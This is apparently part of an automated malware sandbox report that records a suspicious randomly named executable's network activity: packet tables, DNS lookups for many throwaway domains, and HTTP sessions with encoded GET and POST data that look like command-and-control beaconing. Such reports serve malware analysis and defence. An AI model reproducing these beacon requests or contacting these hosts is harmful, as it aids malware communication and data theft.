                                                                                                                                Nov 18, 2024 16:28:32.238336086 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.238354921 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.238372087 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.238513947 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.238552094 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.238612890 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.243421078 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.243477106 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.243511915 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.243542910 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.243863106 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.247591019 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.247626066 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.247661114 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.247767925 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.247786999 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.247986078 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.273894072 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.273907900 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.273921967 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.274010897 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.274024010 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.274137974 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.287542105 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.287576914 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.287610054 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.287739038 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.287739038 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.345206976 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.345299959 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.345349073 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.345395088 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.345434904 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.345460892 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.345504045 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.345551014 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.345583916 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.345583916 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.354233980 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.354329109 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.354379892 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.354437113 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.354538918 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.360948086 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.360992908 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.361006021 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.361334085 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.404599905 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.405019045 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.405034065 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.405214071 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.405214071 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.410662889 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.415585041 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:37.466499090 CET5003380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:37.473195076 CET80500333.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:37.473294973 CET5003380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:37.483262062 CET5003380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:37.488369942 CET80500333.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:38.101088047 CET80500333.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:38.102653980 CET5003380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:39.004038095 CET5003380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:39.009402037 CET80500333.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:40.017354965 CET5003480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:40.022510052 CET80500343.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:40.024665117 CET5003480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:40.034811020 CET5003480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:40.039812088 CET80500343.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:40.737999916 CET80500343.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:40.738063097 CET5003480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:41.561115980 CET5003480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:41.566323042 CET80500343.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:42.578819990 CET5003580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:42.583885908 CET80500353.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:42.584134102 CET5003580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:42.594012022 CET5003580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:42.599014044 CET80500353.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:42.599067926 CET80500353.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:43.220412016 CET80500353.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:43.220499039 CET5003580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:44.106977940 CET5003580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:44.112289906 CET80500353.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:45.126246929 CET5003680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:45.131340981 CET80500363.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:45.131437063 CET5003680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:45.141664982 CET5003680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:45.146562099 CET80500363.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:45.781634092 CET80500363.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:45.782121897 CET80500363.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:45.785368919 CET5003680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:45.785368919 CET5003680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:45.790302992 CET80500363.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:02.009233952 CET5003780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:29:02.014213085 CET80500373.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:02.016797066 CET5003780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:29:02.023539066 CET5003780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:29:02.028976917 CET80500373.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:02.658025980 CET80500373.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:02.658845901 CET80500373.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:02.660752058 CET5003780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:29:02.669452906 CET5003780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:29:02.675072908 CET80500373.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:08.219144106 CET5003880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:29:08.224206924 CET8050038217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:08.224683046 CET5003880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:29:08.234448910 CET5003880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:29:08.239811897 CET8050038217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:09.044819117 CET8050038217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:09.091023922 CET5003880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:29:09.153392076 CET8050038217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:09.153448105 CET5003880192.168.2.6217.70.184.50

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Nov 18, 2024 16:25:29.352694035 CET5307053192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:25:29.376948118 CET53530701.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:46.047473907 CET5383253192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:25:46.105618954 CET53538321.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:59.908366919 CET6091853192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:26:00.031666994 CET53609181.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:13.532277107 CET5989853192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:26:13.572962046 CET53598981.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:21.625716925 CET5145853192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:26:21.637510061 CET53514581.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:35.106189013 CET5598753192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:26:35.805860996 CET53559871.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:49.813204050 CET5274353192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:26:49.859555960 CET53527431.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:04.938005924 CET6008153192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:27:05.030265093 CET53600811.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:18.644334078 CET5669253192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:27:18.656037092 CET53566921.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:32.985760927 CET5983153192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:27:33.001008987 CET53598311.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:46.391268015 CET6267053192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:27:47.038213015 CET53626701.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:00.861145020 CET5267953192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:28:00.978610992 CET53526791.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:14.659775972 CET6444053192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:28:14.720346928 CET53644401.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:23.064984083 CET5958953192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:28:23.314270973 CET53595891.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:37.422597885 CET5135853192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:28:37.464004993 CET53513581.1.1.1192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:50.798669100 CET5050553192.168.2.61.1.1.1
                                                                                                                                Nov 18, 2024 16:28:50.834230900 CET53505051.1.1.1192.168.2.6

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Nov 18, 2024 16:25:29.352694035 CET192.168.2.61.1.1.10x9524Standard query (0)www.corpseflowerwatch.orgA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:25:46.047473907 CET192.168.2.61.1.1.10xfa29Standard query (0)www.4nk.educationA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:25:59.908366919 CET192.168.2.61.1.1.10xd5d3Standard query (0)www.migraine-massages.proA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:26:13.532277107 CET192.168.2.61.1.1.10xe47cStandard query (0)www.vnxoso88.artA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:26:21.625716925 CET192.168.2.61.1.1.10xa7e6Standard query (0)www.pluribiz.lifeA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:26:35.106189013 CET192.168.2.61.1.1.10x1479Standard query (0)www.kdtzhb.topA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:26:49.813204050 CET192.168.2.61.1.1.10x140bStandard query (0)www.evoo.websiteA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:27:04.938005924 CET192.168.2.61.1.1.10x893dStandard query (0)www.astorg-group.infoA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:27:18.644334078 CET192.168.2.61.1.1.10xca73Standard query (0)www.fiqsth.vipA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:27:32.985760927 CET192.168.2.61.1.1.10xa127Standard query (0)www.bio-thymus.comA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:27:46.391268015 CET192.168.2.61.1.1.10x1629Standard query (0)www.wukong.collegeA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:28:00.861145020 CET192.168.2.61.1.1.10xa3f1Standard query (0)www.vehiculargustav.clickA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:28:14.659775972 CET192.168.2.61.1.1.10xbcbcStandard query (0)www.bulls777.proA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:28:23.064984083 CET192.168.2.61.1.1.10xc397Standard query (0)www.yushaliu.onlineA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:28:37.422597885 CET192.168.2.61.1.1.10x29b0Standard query (0)www.marketprediction.appA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:28:50.798669100 CET192.168.2.61.1.1.10xc8f7Standard query (0)www.066bet.xyzA (IP address)IN (0x0001)false

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Nov 18, 2024 16:25:29.376948118 CET1.1.1.1192.168.2.60x9524No error (0)www.corpseflowerwatch.orgcorpseflowerwatch.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:25:29.376948118 CET1.1.1.1192.168.2.60x9524No error (0)corpseflowerwatch.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:25:29.376948118 CET1.1.1.1192.168.2.60x9524No error (0)corpseflowerwatch.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:25:46.105618954 CET1.1.1.1192.168.2.60xfa29No error (0)www.4nk.educationwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:25:46.105618954 CET1.1.1.1192.168.2.60xfa29No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:26:00.031666994 CET1.1.1.1192.168.2.60xd5d3No error (0)www.migraine-massages.pro199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:26:13.572962046 CET1.1.1.1192.168.2.60xe47cName error (3)www.vnxoso88.artnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:26:21.637510061 CET1.1.1.1192.168.2.60xa7e6No error (0)www.pluribiz.life209.74.64.58A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:26:35.805860996 CET1.1.1.1192.168.2.60x1479No error (0)www.kdtzhb.top47.242.89.146A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:26:49.859555960 CET1.1.1.1192.168.2.60x140bNo error (0)www.evoo.website128.65.195.180A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:27:05.030265093 CET1.1.1.1192.168.2.60x893dNo error (0)www.astorg-group.infowebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:27:05.030265093 CET1.1.1.1192.168.2.60x893dNo error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:27:18.656037092 CET1.1.1.1192.168.2.60xca73No error (0)www.fiqsth.vipfiqsth.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:27:18.656037092 CET1.1.1.1192.168.2.60xca73No error (0)fiqsth.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:27:18.656037092 CET1.1.1.1192.168.2.60xca73No error (0)fiqsth.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:27:33.001008987 CET1.1.1.1192.168.2.60xa127No error (0)www.bio-thymus.combio-thymus.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:27:33.001008987 CET1.1.1.1192.168.2.60xa127No error (0)bio-thymus.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:27:33.001008987 CET1.1.1.1192.168.2.60xa127No error (0)bio-thymus.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:27:47.038213015 CET1.1.1.1192.168.2.60x1629No error (0)www.wukong.college47.52.221.8A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:28:00.978610992 CET1.1.1.1192.168.2.60xa3f1No error (0)www.vehiculargustav.clickppp84k45ss7ehy8ypic5x.limelightcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:28:00.978610992 CET1.1.1.1192.168.2.60xa3f1No error (0)ppp84k45ss7ehy8ypic5x.limelightcdn.com23.106.59.18A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:28:14.720346928 CET1.1.1.1192.168.2.60xbcbcNo error (0)www.bulls777.probulls777.proCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:28:23.314270973 CET1.1.1.1192.168.2.60xc397No error (0)www.yushaliu.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:28:37.464004993 CET1.1.1.1192.168.2.60x29b0No error (0)www.marketprediction.appmarketprediction.appCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:28:37.464004993 CET1.1.1.1192.168.2.60x29b0No error (0)marketprediction.app3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:28:37.464004993 CET1.1.1.1192.168.2.60x29b0No error (0)marketprediction.app15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 16:28:50.834230900 CET1.1.1.1192.168.2.60xc8f7Name error (3)www.066bet.xyznonenoneA (IP address)IN (0x0001)false

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • www.corpseflowerwatch.org
                                                                                                                                • www.4nk.education
                                                                                                                                • www.migraine-massages.pro
                                                                                                                                • www.pluribiz.life
                                                                                                                                • www.kdtzhb.top
                                                                                                                                • www.evoo.website
                                                                                                                                • www.astorg-group.info
                                                                                                                                • www.fiqsth.vip
                                                                                                                                • www.bio-thymus.com
                                                                                                                                • www.wukong.college
                                                                                                                                • www.vehiculargustav.click
                                                                                                                                • www.yushaliu.online
                                                                                                                                • www.marketprediction.app

                                                                                                                                HTTP Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.6498293.33.130.190801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:25:29.400605917 CET397OUTGET /yjfe/?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.corpseflowerwatch.org
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:25:30.979819059 CET416INHTTP/1.1 200 OK
                                                                                                                                Server: openresty
                                                                                                                                Date: Mon, 18 Nov 2024 15:25:30 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 276
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 64 6c 44 3d 73 73 4c 6c 2f 37 30 47 41 68 55 63 4b 64 44 67 64 56 66 58 6f 70 37 66 78 52 4d 67 70 59 69 5a 33 76 73 4a 63 63 4f 55 48 79 43 71 7a 63 70 66 72 49 72 72 64 30 34 61 32 4f 41 4e 36 57 66 48 68 77 79 42 30 52 51 2b 44 6c 6a 6e 48 75 36 52 67 75 70 52 5a 74 48 2b 33 42 63 62 59 68 37 56 76 42 55 54 47 31 51 4f 54 6e 4f 6a 79 6d 4c 58 46 6e 67 30 7a 45 6c 6c 59 48 45 6c 35 6d 34 69 39 36 57 55 54 72 30 3d 26 39 32 3d 44 50 79 50 4e 76 66 38 34 66 73 30 79 58 53 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp"}</script></head></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.649908217.70.184.50801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:25:46.126424074 CET640OUTPOST /gnvu/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.4nk.education
                                                                                                                                Origin: http://www.4nk.education
                                                                                                                                Referer: http://www.4nk.education/gnvu/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 47 72 70 4f 49 47 72 70 39 6b 56 42 4e 48 35 32 79 68 52 4e 54 71 44 6c 61 52 50 43 71 4c 64 4d 58 6e 62 6f 4c 75 6f 57 37 55 4a
                                                                                                                                Data Ascii: bdlD=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTGrpOIGrp9kVBNH52yhRNTqDlaRPCqLdMXnboLuoW7UJ
                                                                                                                                Nov 18, 2024 16:25:46.930119991 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 18 Nov 2024 15:25:46 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
